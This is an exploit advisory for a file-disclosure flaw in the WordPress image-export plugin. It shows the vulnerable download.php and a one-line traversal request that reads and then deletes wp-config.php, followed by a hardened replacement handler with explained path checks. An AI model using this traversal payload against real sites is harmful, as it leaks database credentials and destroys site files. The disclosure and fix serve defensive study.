# Exploit Title: WordPress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link: http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0)
# Tested on: Windows/Unix on localhost

download.php file code:

<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
    $file = $_GET['file'];
    header( 'Content-Type: application/zip' );
    header( 'Content-Disposition: attachment; filename="' . $file . '"' );
    readfile( $file );
    unlink( $file );
    exit;
}
?>

Proof of concept:

Note that the file parameter is used unchecked both for readfile() and for unlink(): the requested file is disclosed and then deleted, so a single request can also destroy WordPress core files such as wp-config.php.

Simply add the GET parameter file:

localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php

Found by AMAR^SHG (Shkupi Hackers Group)
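For comparison, a hardened form of the same download handler. This is an added example, not the plugin's code or a vendor fix; it assumes the plugin writes its archives to one export directory (the $export_dir path is a placeholder) and that an authorisation check (in WordPress, a capability check plus a nonce check) has already run before this point. The user-supplied name is reduced to a basename, restricted to a .zip file name, resolved with realpath(), and confirmed to sit inside the export directory before anything is read or unlinked, so traversal sequences such as ../../../wp-config.php are rejected.

```php
<?php
// Added example (not the image-export plugin's code): a hardened replacement
// for the download.php handler shown above. Assumptions: archives are written
// only to $export_dir and are always .zip files; authorisation has already
// been verified by the caller.

/**
 * Resolve a user-supplied file name to a path inside $export_dir.
 * Returns null if the name escapes the directory, is not a .zip, or is missing.
 */
function image_export_resolve( string $requested, string $export_dir ): ?string {
    // Drop every directory component: "../../../wp-config.php" becomes "wp-config.php".
    $name = basename( $requested );

    // Only serve the file type the plugin actually produces; the character
    // whitelist also keeps quotes and CR/LF out of the Content-Disposition header.
    if ( ! preg_match( '/^[A-Za-z0-9_.-]+\.zip$/', $name ) ) {
        return null;
    }

    $base = realpath( $export_dir );
    $path = realpath( $export_dir . DIRECTORY_SEPARATOR . $name );

    // realpath() returns false for a missing file. Also confirm the resolved
    // path still lies under the export directory, which defeats symlinks
    // planted inside it that point elsewhere.
    if ( $base === false || $path === false
         || strpos( $path, $base . DIRECTORY_SEPARATOR ) !== 0
         || ! is_file( $path ) ) {
        return null;
    }
    return $path;
}

if ( isset( $_GET['file'] ) && $_GET['file'] !== '' ) {
    $export_dir = __DIR__ . '/exports'; // placeholder: where the plugin stores generated archives
    $file = image_export_resolve( (string) $_GET['file'], $export_dir );

    if ( $file === null ) {
        http_response_code( 404 );
        exit;
    }

    header( 'Content-Type: application/zip' );
    header( 'Content-Disposition: attachment; filename="' . basename( $file ) . '"' );
    header( 'Content-Length: ' . filesize( $file ) );
    readfile( $file );
    unlink( $file ); // can now only ever remove a file inside the export directory
    exit;
}
```

The two checks are deliberately independent: basename() alone would still allow a symlink inside the export directory to point at wp-config.php, and the realpath() prefix check alone would still accept non-archive files placed there, so both are applied before readfile() and unlink() see the path.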